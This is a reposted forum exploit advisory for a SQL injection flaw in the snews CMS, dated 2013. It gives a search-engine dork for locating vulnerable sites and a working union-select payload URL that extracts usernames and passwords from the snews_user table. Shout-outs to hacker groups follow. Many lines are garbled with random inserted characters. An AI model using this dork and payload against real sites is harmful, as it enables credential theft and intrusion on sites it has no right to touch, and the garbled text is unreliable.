标题: CMS snews SQL Injection Vulnerability7 s$ I+ I' i' m) V$ e7 Z- Q5 m
作者: By onestree
0 s# b0 N6 h6 J; p5 S下载地址 : http://snewscms.com/, X# o* k2 k+ ^
测试平台 : ubuntu 12.10 / win 7, K2 R% c$ z# s
关键词: inurl:"tanyakan pada rumput yang bergoyang"
' ]+ S+ V6 K: b3 i7 O9 P
# V2 ^, @/ R/ Z! Q
1 R( c1 C8 }/ R( ^9 n1 E*************************************************************
4 e% r+ X. A4 N2 k* U ( b6 G& J5 H+ ?9 \6 E. t! e& {/ S; D$ j
SQL poc:1 q: C) V9 P s1 L' @3 v
( L6 e! X- y9 L2 lhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
, [. Z0 ]$ N% w- U* \/ b
0 v1 v/ d- P) C9 ?示例
* t0 s6 {# R) q: C 7 m0 x: m- X# r0 _$ o
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*5 v, D' |& Z5 u: N
- L3 F& G2 H1 a) u+ ?
9 h! F. Z( I) k( a! l( v D致谢:
1 ?, z6 z( e& S9 ^# F! g
% @( W H$ \" D3 M5 `; M6 a Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
- W1 g8 t3 @: w* b: [
! X- ]$ |5 f7 m+ w& K; C+ h indonesiancoder - moeslimh4x0r - go-coder4 _& u3 |" `6 o8 S& G
3 V# [, N( C5 e; }+ h+ Y8 E8 v
spesial my hunny :*7 @( M- r# |# \4 [8 g% v
|
发表于 2013-1-23 08:55:06
收藏
支持
反对